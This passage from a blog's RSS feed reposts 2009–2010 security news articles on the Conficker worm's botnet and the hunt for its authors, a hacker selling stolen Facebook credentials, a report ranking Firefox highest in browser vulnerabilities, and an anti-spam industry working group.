Assigned Names and Numbers, the organization that supervises registries worldwide.
“It was our finest hour,” Joffe says. 
&lt;/p&gt;
&lt;p&gt;
“I don’t think that the bad guys could have expected the research community to come
together as it did, because it was pretty unprecedented,” Ramses Martinez, director
of information security for VeriSign, told me. “That was a new thing that happened.
I mean, if you would have told me everybody’s going to come together—by&lt;i&gt; everybody&lt;/i&gt;,
I mean all these guys in this computer-security world that know each other—and they’re
going to do this thing, I would have said, ‘You’re crazy.’ I don’t think the bad guys
could have expected that.” 
&lt;/p&gt;
&lt;p&gt;
Much of the computer world was watching, in considerable suspense, to see what would
happen on April 1. It was like the moment in a movie when the bad guy at last has
cornered the hero. He pulls out an enormous gun and aims it at the hero’s head, pulls
the trigger … and out pops a little flag with the word BANG!
&lt;/p&gt;
&lt;p&gt;
Conficker found one or two domain names that Joffe’s group had missed, which was all
it needed. The cabal’s efforts had succeeded in vastly reducing the number of machines
that got the update, but the ones that did went to work distributing a very conventional,
well-known malware called &lt;a href="http://www.f-secure.com/v-descs/email-worm_w32_waledac_a.shtml"&gt;Waledac&lt;/a&gt;,
which sends out e-mail spam selling a fake anti-spyware program. The worm was used
to distribute Waledac for two weeks, and then stopped. 
&lt;/p&gt;
&lt;p&gt;
But something much more important had happened. The updated worm didn’t just up the
ante by generating 50,000 domain names daily; it effectively moved the game out of
the cabal’s reach. 
&lt;/p&gt;
&lt;p&gt;
“April 1 came and went, and in the middle of that night the systems switched over
to the new algorithm,” Conficker C, Joffe told me. “That’s all that was supposed to
happen, and it happened. But the Internet didn’t get infected; it was just an algorithm
change in the software. So of course the press said, ‘Conficker is a bust.’” 
&lt;/p&gt;
&lt;p&gt;
Public concern over the worm fizzled, just as the problem grew worse: the new version
of Conficker introduced peer-to-peer communications, which was disheartening to the
good guys, to say the least. Peer-to-peer operations meant the worm no longer had
to sneak in through Windows Port 445 or a USB drive; an infected computer spread the
worm directly to every machine it interacted with. It also meant that Conficker no
longer needed to call out to a command center for instructions; they could be distributed
directly, computer to computer. And since the worm no longer needed to call home,
there was no longer any way to tell how many computers were infected. 
&lt;/p&gt;
&lt;p&gt;
In the great chess match, the worm had just pronounced “Checkmate.” 
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Watching and Waiting &lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
As of this writing, 17 months after it appeared and about a year after the April 1
update, Conficker has created a stable botnet. It consists of anywhere from hundreds
of thousands of computers to 12 million. No one knows for sure anymore, because with
peer-to-peer communications, the worm no longer needs to check in with an outside
command center, which is how the good guys kept count. Joffe estimates that with the
four distinct strains (yet another one appeared on April 8, 2009), 6.5 million computers
are probably infected. 
&lt;/p&gt;
&lt;p&gt;
The investigators see no immediate chance or even any effective way to kill it. 
&lt;/p&gt;
&lt;p&gt;
“There are a bunch of infected machines that are out there, and they can be taken
over, given the right circumstances, by the bad guys,” VeriSign’s Martinez says. “Will
they do that? I don’t know. So it’s a potential threat. It’s something that’s out
there, sitting there, and it needs to be addressed, but I don’t think, honestly, that
we know how. How do we address this? If it was sitting in the U.S., it would be a
fairly easy thing to do. The fact is that it’s spread out all around the world.” 
&lt;/p&gt;
&lt;p&gt;
Ever since the paltry Waledac scam, the worm has been biding its time. 
&lt;/p&gt;
&lt;p&gt;
“They are watching us watch them,” says Andre’ DiMino, the botnet hunter. “I think
it’s really either that or somebody let this thing get bigger, and it’s advanced bigger
and further than they ever dreamed possible. A lot of people think that. But in looking
at the sophistication of this thing and looking at the evolution of this thing, I
think they knew exactly what they were doing. I think they were trying something,
and I think that they’re too smart to do what everybody figured they were going to
do. You have to remember, the world was watching this thing and waiting for the world
to end from Conficker on April 1, 2009. The last thing you’d want to do if you’re
the bad guy is make something happen on April 1. You’re never going to do that, because
everybody’s watching it. You’re going to do something when you’re least suspected.
So these guys are sophisticated. They have good code. And just even seeing the evolution
from Conficker A to B to C, where there’s the peer-to-peer component, which … strikes
fear into the heart of botnet hunters because it’s just so damn difficult to track—these
guys know exactly what they’re doing.” 
&lt;/p&gt;
&lt;p&gt;
So who are they? 
&lt;/p&gt;
&lt;p&gt;
One of the things Martinez’s team does, patrolling the perimeter at VeriSign looking
for threats, is dip into the obscure digital forums where cyber criminals converse.
Those who are engaged in writing sophisticated malware boast and threaten and compare
notes. The good guys venture in to collect intelligence, or just out of curiosity,
or for fun. They sometimes pretend to be malware creators themselves, sometimes not.
Sometimes they engage in a little cyber trash talk. 
&lt;/p&gt;
&lt;p&gt;
“In the past you were just sort of making sure they didn’t steal your proprietary
information,” Martinez says. “Now we go in to engage them. You talk to them and you
exchange information. You have a guy in Russia selling malware, working with a guy
in Mexico doing phishing attacks, who’s talking to a kid in Brazil, who’s doing credit-card
fraud, and they’re introducing each other to some guy in China doing something else.” 
&lt;/p&gt;
&lt;p&gt;
Martinez said he recently eavesdropped on a dialogue between a security researcher
and a man he suspects was at least partly responsible for Conficker. He wouldn’t say
how he drew that connection, only that he had good reasons for believing it to be
true. The suspect in the conversation was eastern European. The standard image of
a malware creator is the Hollywood one: a brilliant 20-something with long hair and
a bad attitude, in need of a bath. This is not how Martinez sees his nemesis—or nemeses. 
&lt;/p&gt;
&lt;p&gt;
“I see him, or them, as a really well-educated, smart businessman,” he said. “He may
be 50 years old. These guys are not chumps. They’re not just out to make a buck.” 
&lt;/p&gt;
&lt;p&gt;
The eastern European, backpedaling from further dialogue with the security geek, wrote,
“You’re the good guys; we’re the bad guys. Bacillus can’t live with antibodies.” 
&lt;/p&gt;
&lt;p&gt;
“Now, I didn’t grow up in a bad neighborhood or anything,” said Martinez, “but the
few thugs that I saw would never use a word like &lt;i&gt;bacillus&lt;/i&gt; or make an analogy
like that.” 
&lt;/p&gt;
&lt;p&gt;
One of the early clues in the hunt was the peculiarity in the Conficker code that
made computers with active Ukrainian keyboards immune. Much of the world’s aggressive
malware comes from eastern Europe, where there are high levels of education and technical
expertise, and also thriving organized criminal gangs. Martinez believes Conficker
was written by a group of highly skilled programmers. Like Joffe, he sees it as a
group of creators, because designing the worm required expertise in so many different
disciplines. He suspects that these skilled programmers and technicians either were
hired by a criminal gang, or created the worm as their own illicit business venture.
If that’s true, then the Waledac maneuver was like flexing Conficker’s pinkie—just
a demonstration, a way of showing that despite the best and most concerted effort
of the world’s computer-security establishment, the worm was fully operational and
under their control. 
&lt;/p&gt;
&lt;p&gt;
Will they be caught? 
&lt;/p&gt;
&lt;p&gt;
“I have no idea,” Martinez says. “I would say probably not. I’ll be shocked if they’re
ever arrested. And arrest them for what? Is breaking into people’s computers even
illegal where they’re from? Because in a lot of countries, it isn’t. As a matter of
fact, in some countries, unless you’re touching a computer in their jurisdiction,
their country, that’s not illegal. So who’s going to arrest them, even if we know
who they are?” 
&lt;/p&gt;
&lt;p&gt;
Ridding computers of the worm poses another kind of overwhelming problem. 
&lt;/p&gt;
&lt;p&gt;
“There are controls, or checks and balances, in place to limit what police can do,
because we have civil liberties to protect,” he says. “If you do away with these checks
and balances, where the government can come in and reimage your computer overnight,
now you’re infringing on people’s civil liberties. So, I mean, we can talk about this
all day, but I’ll tell you, it’s going to be a long time, in my opinion, before we
really see the government being able to effectively deal with cyber crime, because
I think we’re still learning as a culture, as a nation, and as a world how to deal
with this stuff. It’s too new.” 
&lt;/p&gt;
&lt;p&gt;
Imagining Conficker’s creators as a skilled group of illicit cyber entrepreneurs remains
the prevailing theory. Some of the good guys feel that the worm will never be used
again. They argue that it has become too notorious, too visible, to be useful. Its
creators have learned how to whip computer-security systems worldwide, and will now
use that knowledge to craft an even stealthier worm, and perhaps sell it to the highest
bidder. Few believe Conficker itself is the work of any one nation, because other
than the initial quirk of the Ukrainian-keyboard exemption, it spreads indiscriminately.
China is the nation most often suspected in cyber attacks, but there may be more Conficker-infected
computers in China than anywhere else. Besides, a nation seeking to create a botnet
weapon is unlikely to create one as brazen as Conficker, which from the start has
exhibited a thumb-in-your-eye, catch-me-if-you-can personality. It is hard to imagine
Conficker’s creators not enjoying the high level of cyber gamesmanship. The good guys
certainly have. 
&lt;/p&gt;
&lt;p&gt;
“It’s cops and robbers, so to speak, and that was a really interesting aspect of the
work for me,” says Martinez. “It’s guys trying to outwit each other and exploit vulnerabilities
in this vast network.” 
&lt;/p&gt;
&lt;p&gt;
In chess, when your opponent checkmates you, you have no recourse. You concede and
shake the victor’s hand. In the real-world chess match over Conficker, the good guys
have another recourse. They can, in effect, upend the board and go after the bad guys
physically. Which is where things stand. The hunt for the mastermind (or masterminds)
behind the worm is ongoing. 
&lt;/p&gt;
&lt;p&gt;
“It’s an active investigation,” Joffe says. “That’s all I can say. Law enforcement
is fully engaged. We have some leads. This story is not over.” 
&lt;/p&gt;
&lt;p&gt;
&lt;strong&gt;This article available online at:&lt;/strong&gt; &lt;a href="http://www.theatlantic.com/magazine/archive/2010/06/the-enemy-within/8098/"&gt;http://www.theatlantic.com/magazine/archive/2010/06/the-enemy-within/8098/&lt;/a&gt;
&lt;/p&gt;
</description>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
      <category>tech</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=f0b865a3-1fdd-4bc5-b264-fdd89e6547e6</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,f0b865a3-1fdd-4bc5-b264-fdd89e6547e6.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
A hacker named Kirllos has a rare deal for anyone who wants to spam, steal or scam
on Facebook: an unprecedented number of user accounts offered at rock-bottom prices.
</p>
        <p>
Researchers at VeriSign's iDefense group recently spotted Kirllos selling Facebook
user names and passwords in an underground hacker forum, but what really caught their
attention was the volume of credentials he had for sale: 1.5 million accounts.
</p>
        <p>
IDefense doesn't know if Kirllos' accounts are legitimate, and Facebook didn't respond
to messages Thursday seeking comment. If they are legitimate, he has the account information
of about one in every 300 Facebook users. His asking price varies from US$25 to $45
per 1,000 accounts, depending on the number of contacts each user has.
</p>
        <p>
To date, Kirllos seems to have sold close to 700,000 accounts, according to VeriSign
Director of Cyber Intelligence Rick Howard.
</p>
        <p>
Hackers have been selling stolen social-networking credentials for a while -- VeriSign
has seen a brisk trade in names and passwords for Russia's VKontakte, for example.
But now the trend is to go after global targets such as Facebook, Howard said.
</p>
        <p>
Facebook has more than 400 million users worldwide, many of whom fall victim to scams
each day. In one such scam, criminals send out messages from a compromised account,
telling friends that the account's owner is trapped in a foreign country and needs
money to get home.
</p>
        <p>
In another, they send Web links that lead to malicious software, telling friends that
it's a hilarious or sensationalistic video.
</p>
        <p>
"People will follow it because they believe it was a friend that told them to
go to this link," said Randy Abrams, director of technical education with security
vendor Eset. Once the malware gets installed, criminals can steal more passwords,
break into bank accounts, or simply use the computers to send spam or launch distributed
denial of service attacks. "There's just a plethora of things that people can
do if they can trick people into installing their software," he said.
</p>
        <p>
Kirllos' Facebook prices are extremely cheap compared to what others are charging.
In its most recent <a href="http://www.symantec.com/business/theme.jsp?themeid=threatreport">Internet
Security Threat Report</a>, Symantec found that e-mail usernames and passwords typically
went for between $1 to $20 per account -- Kirllos wants as little as $0.025 per Facebook
account. More coveted credit card or bank account details can go for much more, ranging
between $0.85 to $30 for credit card numbers to $15 to $850 for top-quality online
bank accounts.
</p>
        <p>
[via <a title="http://www.pcworld.com/businesscenter/article/194843/15_million_stolen_facebook_ids_up_for_sale.html" href="http://www.pcworld.com">www.pcworld.com</a>]
</p>
        <hr />
        <h3>Hacker offers 1.5 million Facebook accounts for sale
</h3>
        <p>
"Kirllos" is offering around 1.5 million Facebook login credentials for sale online.
The prices are surprisingly cheap: for 1,000 accounts he asks between 25 and 45 dollars.
Kirllos is said to have already sold off 700,000 accounts. There is no end
in sight.
</p>
        <p>
It has long been no secret that social networks such as Facebook and StudiVZ
are a thorn in the side of privacy advocates and consumer advocates. The skepticism is not
unfounded, because surprising data leaks occur again and again, attributable to unclear
privacy policies and irresponsible behavior on the part of users.
The latest case, too, is alarming numerous net activists. According to a report
by "PC World", the Russian-born hacker "Kirllos" is offering
around 1.5 million login credentials for the social network Facebook for sale. The
hacker is trying to win customers over with rock-bottom prices. For data sets
of 1,000 accounts he asks only 25 to 45 US dollars. "Kirllos" has already been able
to turn 700,000 accounts into money this way. 
</p>
        <p>
The hacker's offer was reportedly first noticed in a well-known hacker forum.
Word of the offer from "Kirllos" is said to have spread quickly among insiders
because the prices were unusually low. While one to 20 US dollars per account
is usually demanded, the Russian-born hacker is offering the accounts at bargain prices,
the report says. At an average of not even two cents per account, the price
in this case is surprisingly low. The price of the data sets varies depending on how many
friends the respective accounts have. The user's activity is also said to be
of great importance for the pricing. 
<br />
Which users have been affected is not yet known. Given that
Facebook currently has more than 400 million users and the hacker "Kirllos"
is in possession of 1.5 million accounts, the scale nevertheless seems overwhelming.
If the figures are correct, the hacker would have access to roughly every 267th account.
</p>
        <p>
[via <a title="http://www.gulli.com/news/hacker-bietet-1-5-millionen-facebook-konten-zum-verkauf-2010-04-24" href="http://www.gulli.com">www.gulli.com</a>]
</p>
      </body>
      <title>1.5 Million Stolen Facebook IDs up for Sale</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,f0b865a3-1fdd-4bc5-b264-fdd89e6547e6.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2010/04/26/15MillionStolenFacebookIDsUpForSale.aspx</link>
      <pubDate>Mon, 26 Apr 2010 01:35:25 GMT</pubDate>
      <description>&lt;p&gt;
A hacker named Kirllos has a rare deal for anyone who wants to spam, steal or scam
on Facebook: an unprecedented number of user accounts offered at rock-bottom prices.
&lt;/p&gt;
&lt;p&gt;
Researchers at VeriSign's iDefense group recently spotted Kirllos selling Facebook
user names and passwords in an underground hacker forum, but what really caught their
attention was the volume of credentials he had for sale: 1.5 million accounts.
&lt;/p&gt;
&lt;p&gt;
IDefense doesn't know if Kirllos' accounts are legitimate, and Facebook didn't respond
to messages Thursday seeking comment. If they are legitimate, he has the account information
of about one in every 300 Facebook users. His asking price varies from US$25 to $45
per 1,000 accounts, depending on the number of contacts each user has.
&lt;/p&gt;
&lt;p&gt;
To date, Kirllos seems to have sold close to 700,000 accounts, according to VeriSign
Director of Cyber Intelligence Rick Howard.
&lt;/p&gt;
&lt;p&gt;
Hackers have been selling stolen social-networking credentials for a while -- VeriSign
has seen a brisk trade in names and passwords for Russia's VKontakte, for example.
But now the trend is to go after global targets such as Facebook, Howard said.
&lt;/p&gt;
&lt;p&gt;
Facebook has more than 400 million users worldwide, many of whom fall victim to scams
each day. In one such scam, criminals send out messages from a compromised account,
telling friends that the account's owner is trapped in a foreign country and needs
money to get home.
&lt;/p&gt;
&lt;p&gt;
In another, they send Web links that lead to malicious software, telling friends that
it's a hilarious or sensationalistic video.
&lt;/p&gt;
&lt;p&gt;
&amp;quot;People will follow it because they believe it was a friend that told them to
go to this link,&amp;quot; said Randy Abrams, director of technical education with security
vendor Eset. Once the malware gets installed, criminals can steal more passwords,
break into bank accounts, or simply use the computers to send spam or launch distributed
denial of service attacks. &amp;quot;There's just a plethora of things that people can
do if they can trick people into installing their software,&amp;quot; he said.
&lt;/p&gt;
&lt;p&gt;
Kirllos' Facebook prices are extremely cheap compared to what others are charging.
In its most recent &lt;a href="http://www.symantec.com/business/theme.jsp?themeid=threatreport"&gt;Internet
Security Threat Report&lt;/a&gt;, Symantec found that e-mail usernames and passwords typically
went for between $1 to $20 per account -- Kirllos wants as little as $0.025 per Facebook
account. More coveted credit card or bank account details can go for much more, ranging
between $0.85 to $30 for credit card numbers to $15 to $850 for top-quality online
bank accounts.
&lt;/p&gt;
&lt;p&gt;
[via &lt;a title="http://www.pcworld.com/businesscenter/article/194843/15_million_stolen_facebook_ids_up_for_sale.html" href="http://www.pcworld.com"&gt;www.pcworld.com&lt;/a&gt;]
&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;Hacker offers 1.5 million Facebook accounts for sale
&lt;/h3&gt;
&lt;p&gt;
&amp;quot;Kirllos&amp;quot; is offering around 1.5 million Facebook login credentials for sale online.
The prices are surprisingly cheap: for 1,000 accounts he asks between 25 and 45 dollars.
Kirllos is said to have already sold off 700,000 accounts. There is no end
in sight.
&lt;/p&gt;
&lt;p&gt;
It has long been no secret that social networks such as Facebook and StudiVZ
are a thorn in the side of privacy advocates and consumer advocates. The skepticism is not
unfounded, because surprising data leaks occur again and again, attributable to unclear
privacy policies and irresponsible behavior on the part of users.
The latest case, too, is alarming numerous net activists. According to a report
by &amp;quot;PC World&amp;quot;, the Russian-born hacker &amp;quot;Kirllos&amp;quot; is offering
around 1.5 million login credentials for the social network Facebook for sale. The
hacker is trying to win customers over with rock-bottom prices. For data sets
of 1,000 accounts he asks only 25 to 45 US dollars. &amp;quot;Kirllos&amp;quot; has already been able
to turn 700,000 accounts into money this way. 
&lt;/p&gt;
&lt;p&gt;
The hacker's offer was reportedly first noticed in a well-known hacker forum.
Word of the offer from &amp;quot;Kirllos&amp;quot; is said to have spread quickly among insiders
because the prices were unusually low. While one to 20 US dollars per account
is usually demanded, the Russian-born hacker is offering the accounts at bargain prices,
the report says. At an average of not even two cents per account, the price
in this case is surprisingly low. The price of the data sets varies depending on how many
friends the respective accounts have. The user's activity is also said to be
of great importance for the pricing. 
&lt;br /&gt;
Which users have been affected is not yet known. Given that
Facebook currently has more than 400 million users and the hacker &amp;quot;Kirllos&amp;quot;
is in possession of 1.5 million accounts, the scale nevertheless seems overwhelming.
If the figures are correct, the hacker would have access to roughly every 267th account.
&lt;/p&gt;
&lt;p&gt;
[via &lt;a title="http://www.gulli.com/news/hacker-bietet-1-5-millionen-facebook-konten-zum-verkauf-2010-04-24" href="http://www.gulli.com"&gt;www.gulli.com&lt;/a&gt;]
&lt;/p&gt;
</description>
      <category>DE</category>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
      <category>social</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=482651a5-95d8-4210-b11b-5098f0e96fc0</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,482651a5-95d8-4210-b11b-5098f0e96fc0.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
New study places Firefox at the top of the vulnerability list for the first half of
2009:
</p>
        <p>
Application security vendor Cenzic today released its security trends report for the
first half of 2009. In it, Cenzic claims that Mozilla's Firefox browser
led the field of Web browsers in terms of total vulnerabilities. 
</p>
        <p>
According to Cenzic, Firefox accounted for 44 percent of all browser vulnerabilities
reported in the first half of 2009. In contrast, Apple's Safari had 35 percent of
all reported browser vulnerabilities, Microsoft's Internet Explorer was third at 15
percent and Opera had just a six percent share. 
</p>
        <p>
The 2009 figures stand in contrast to Cenzic's Q3/Q4 2008 <a href="http://blog.internetnews.com/skerner/2009/03/cenzic-ie-tops-browser-vuln-li.html">report</a>,
where IE accounted for 43 percent of all reported Web browser vulnerabilities and
Firefox followed closely at 39 percent. 
</p>
        <p>
As to why Firefox's numbers were so high, Cenzic has a few ideas.
</p>
        <p>
"It's a combination of different things," Lars Ewe, CTO of Cenzic, told <i>InternetNews.com</i>.
"They've gotten more traction as a browser, which is good for them and the more
you get used the more exposure you have. As well a fair amount of the vulnerabilities
have come by way of plug-ins." 
</p>
        <p>
One key area that Ewe said was responsible for a number of reported Firefox vulnerabilities
is how the browser handles plug-ins. 
</p>
        <p>
"The plug-in architecture that they have is a selling fact for the browser and
one of the reasons why I love using it," Ewe said. "They can't control security
aspects of all the plug-ins and the vulnerabilities are a side effect of that." 
</p>
        <p>
Mozilla has made numerous efforts this year to bolster its plug-in security. Recently
they launched a <a href="http://blog.internetnews.com/skerner/2009/09/mozilla-firefox-353-will-check.html">plug-in
checker</a> service to ensure that users are running up-to-date versions. The <a href="http://blog.internetnews.com/skerner/2009/04/mozilla-firefox-309-fixes-xss.html">Firefox
3.0.9 update</a>, which came out in April, specifically addressed several key plug-in
vulnerabilities.
</p>
        <p>
Though Firefox had the highest number of vulnerabilities, that doesn't necessarily
mean that Firefox users were more vulnerable. 
</p>
        <p>
Ewe said that Cenzic looked at all reported vulnerabilities. There is no specific
differentiation for zero day bugs in the browser vulnerability count either. All that
raises the question of how Cenzic actually came up with their vulnerability counts
in the first place. 
</p>
        <p>
"The process that we follow is looking at a number of different vulnerability
databases and sources that we have and trying to come up with a fair percentage based
on the deviations we see between the databases," Ewe said. "You could make
the argument, that it's 40 percent or 42 percent and there might be some variation
on how you analyze it, but certainly it's not off by 20 percent." 
</p>
        <p>
While the Cenzic report shows Firefox at the top of the browser vulnerability pile,
Ewe was quick to note that Cenzic uses Mozilla technology within its own solutions. 
</p>
        <p>
"Full disclosure here, Mozilla plays an important role in Cenzic's solution,"
Ewe said. "We are actually sitting on top of Mozilla as our agent of preference
for scanning sites." 
</p>
        <p>
Cenzic develops an application scanning solution that uses the underlying Mozilla
browser technology to test the security of Web sites inside a real browser context. 
</p>
        <p>
"We have a technology that we refer to as stateful assessment technology,"
Ewe said. "The idea behind it is to have as faithful an interaction with a Web
site as possible and to determine vulnerabilities not on simple signatures but on
behavioral basis of the application." 
</p>
        <p>
Ewe explained that when you do a cross-site scripting attack with a signature-based
approach you'd just look for a server response that would indicate that the script
tag has been injected. He added that the problem with that approach is that it's not
faithful and the security researcher doesn't know if there is any additional logic
on the client side that takes care of the script tag. 
</p>
        <p>
"If you want to be really faithful in the process you need to have full rendering
capabilities and have all the JavaScript event handling," Ewe said. "So
we leverage the entire Firefox architecture in order for us to actually have as faithful
an interaction with a server as possible and maintain the client state. That results
in low false-positives."
</p>
        <p>
Source: <a title="http://www.internetnews.com/software/article.php/3847461" href="http://www.internetnews.com">www.internetnews.com</a></p>
      </body>
      <title>Firefox Tops Vulnerability List?</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,482651a5-95d8-4210-b11b-5098f0e96fc0.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2009/11/11/FirefoxTopsVulnerabilityList.aspx</link>
      <pubDate>Wed, 11 Nov 2009 01:59:16 GMT</pubDate>
      <description>&lt;p&gt;
New study places Firefox at the top of the vulnerability list for the first half of
2009:
&lt;/p&gt;
&lt;p&gt;
Application security vendor Cenzic today released its security trends report for the
first half of 2009. In it, Cenzic claims that Mozilla's Firefox browser
led the field of Web browsers in terms of total vulnerabilities. 
&lt;/p&gt;
&lt;p&gt;
According to Cenzic, Firefox accounted for 44 percent of all browser vulnerabilities
reported in the first half of 2009. In contrast, Apple's Safari had 35 percent of
all reported browser vulnerabilities, Microsoft's Internet Explorer was third at 15
percent and Opera had just a six percent share. 
&lt;/p&gt;
&lt;p&gt;
The 2009 figures stand in contrast to Cenzic's Q3/Q4 2008 &lt;a href="http://blog.internetnews.com/skerner/2009/03/cenzic-ie-tops-browser-vuln-li.html"&gt;report&lt;/a&gt;,
where IE accounted for 43 percent of all reported Web browser vulnerabilities and
Firefox followed closely at 39 percent. 
&lt;/p&gt;
&lt;p&gt;
As to why Firefox's numbers were so high, Cenzic has a few ideas.
&lt;/p&gt;
&lt;p&gt;
&amp;quot;It's a combination of different things,&amp;quot; Lars Ewe, CTO of Cenzic, told &lt;i&gt;InternetNews.com&lt;/i&gt;.
&amp;quot;They've gotten more traction as a browser, which is good for them and the more
you get used the more exposure you have. As well a fair amount of the vulnerabilities
have come by way of plug-ins.&amp;quot; 
&lt;/p&gt;
&lt;p&gt;
One key area that Ewe said was responsible for a number of reported Firefox vulnerabilities
is how the browser handles plug-ins. 
&lt;/p&gt;
&lt;p&gt;
&amp;quot;The plug-in architecture that they have is a selling fact for the browser and
one of the reasons why I love using it,&amp;quot; Ewe said. &amp;quot;They can't control security
aspects of all the plug-ins and the vulnerabilities are a side effect of that.&amp;quot; 
&lt;/p&gt;
&lt;p&gt;
Mozilla has made numerous efforts this year to bolster its plug-in security. Recently
they launched a &lt;a href="http://blog.internetnews.com/skerner/2009/09/mozilla-firefox-353-will-check.html"&gt;plug-in
checker&lt;/a&gt; service to ensure that users are running up-to-date versions. The &lt;a href="http://blog.internetnews.com/skerner/2009/04/mozilla-firefox-309-fixes-xss.html"&gt;Firefox
3.0.9 update&lt;/a&gt;, which came out in April, specifically addressed several key plug-in
vulnerabilities.
&lt;/p&gt;
&lt;p&gt;
Though Firefox had the highest number of vulnerabilities, that doesn't necessarily
mean that Firefox users were more vulnerable. 
&lt;/p&gt;
&lt;p&gt;
Ewe said that Cenzic looked at all reported vulnerabilities. There is no specific
differentiation for zero day bugs in the browser vulnerability count either. All that
raises the question of how Cenzic actually came up with their vulnerability counts
in the first place. 
&lt;/p&gt;
&lt;p&gt;
&amp;quot;The process that we follow is looking at a number of different vulnerability
databases and sources that we have and trying to come up with a fair percentage based
on the deviations we see between the databases,&amp;quot; Ewe said. &amp;quot;You could make
the argument, that it's 40 percent or 42 percent and there might be some variation
on how you analyze it, but certainly it's not off by 20 percent.&amp;quot; 
&lt;/p&gt;
&lt;p&gt;
While the Cenzic report shows Firefox at the top of the browser vulnerability pile,
Ewe was quick to note that Cenzic uses Mozilla technology within its own solutions. 
&lt;/p&gt;
&lt;p&gt;
&amp;quot;Full disclosure here, Mozilla plays an important role in Cenzic's solution,&amp;quot;
Ewe said. &amp;quot;We are actually sitting on top of Mozilla as our agent of preference
for scanning sites.&amp;quot; 
&lt;/p&gt;
&lt;p&gt;
Cenzic develops an application scanning solution that uses the underlying Mozilla
browser technology to test the security of Web sites inside a real browser context. 
&lt;/p&gt;
&lt;p&gt;
&amp;quot;We have a technology that we refer to as stateful assessment technology,&amp;quot;
Ewe said. &amp;quot;The idea behind it is to have as faithful an interaction with a Web
site as possible and to determine vulnerabilities not on simple signatures but on
behavioral basis of the application.&amp;quot; 
&lt;/p&gt;
&lt;p&gt;
Ewe explained that when you do a cross-site scripting attack with a signature-based
approach you'd just look for a server response that would indicate that the script
tag has been injected. He added that the problem with that approach is that it's not
faithful and the security researcher doesn't know if there is any additional logic
on the client side that takes care of the script tag. 
&lt;/p&gt;
&lt;p&gt;
&amp;quot;If you want to be really faithful in the process you need to have full rendering
capabilities and have all the JavaScript event handling,&amp;quot; Ewe said. &amp;quot;So
we leverage the entire Firefox architecture in order for us to actually have as faithful
an interaction with a server as possible and maintain the client state. That results
in low false-positives.&amp;quot;
&lt;/p&gt;
&lt;p&gt;
Source: &lt;a title="http://www.internetnews.com/software/article.php/3847461" href="http://www.internetnews.com"&gt;www.internetnews.com&lt;/a&gt;
&lt;/p&gt;
</description>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=002b1575-8632-4b01-a776-3662400d0656</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,002b1575-8632-4b01-a776-3662400d0656.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
The people who run the world's internet systems are a rather secretive bunch. 
Three times a year, senior technical officers from companies such as Google, Yahoo,
AT&amp;T, Comcast and Verizon meet to discuss ways of stopping the internet from being
swamped by rising levels of spam, viruses and hacking attacks by organised criminals.
They do not generally like discussing these meetings.  "Some people might
get nervous if they knew all the things we talked about," said Michael O'Rierdan,
chairman of the Messaging Anti-Abuse Working Group (MAAWG). "It’s our job to
make the internet safe, but we don't want to put people off using the web." 
They are also worried about being targeted by the cyber-criminals they are trying
to thwart.
</p>
        <p>
Most of the spam and hacking on the internet is run by organised crime rings. There
is an underground economy that hacks into computers, sells stolen identities and orchestrates
the sending of spam e-mails about everything from fake Viagra pills to banking scams.
There is a lot of money at stake in keeping these operations running.  "We get
threats every day," said Larry, chief technical officer of Spamhaus, a non-profit
organisation that exposes spammers. He prefers not to reveal his surname. "In
the US it is people bringing lawsuits against us. And then there are organised criminals
in Russia and Ukraine, who use different methods."  Steve Linford, the organisation's
founder, has been advised by police not to open unexpected packages arriving at his
home.
</p>
        <p>
MAAWG meetings are also places to discuss some of the controversial measures that
internet companies need to take in the fight against spam, such as blocking some types
of e-mail traffic. This measure sits awkwardly with civil liberties bodies. 
The 270 delegates from 19 countries who met at Amsterdam's venerable Hotel Krasnapolsky
last week were far from the usual, suit-wearing conference crowd. An eclectic mix
of tattoos, ponytails, high-waisted trousers and backpacks indicated that these were
true operations people who work in the bowels of the network.  Membership is
strictly vetted and journalists are not normally invited to attend, but MAAWG has
started to lift its veil a little. There is a growing feeling that the industry must
reach out to consumers and get them to help fight cyber-crime.
</p>
        <p>
In 2008, 349.6bn spam messages were sent across the internet, according to Symantec,
the internet security company. Spam accounts for an average of almost 94 per cent
of all e-mail messages.  Nearly 90 per cent of spam is sent from computers that
have been hacked into and are being remotely programmed to send out spam.  More
than 9.4m computers have been hijacked in this way and their owners are usually entirely
unaware it is going on. It will be impossible to clean up these machines without talking
to consumers.
</p>
        <p>
"Sometimes we want people to know what we are doing, so they can yell at the
politicians to give us more help," said Jerry Upton, executive director of MAAWG. 
There is a rising sense of crisis among internet companies about the cost of spam.
Few are willing to quantify how much they have to spend to fight spam, but Mr O'Rierdan
estimated that big internet service providers employ five to 10 staff just to look
at spam. In addition they must buy spare servers, routers and other equipment to cope
with the volumes of junk mail, buy spam-filtering software and run support centers
for their customers.
</p>
        <p>
Viriya Upatising, chief technical officer of True Internet, a Thai internet service
provider, said junk mail was a crippling cost for the company because it was paying
to send the unwanted data across undersea cable connections to destinations such as
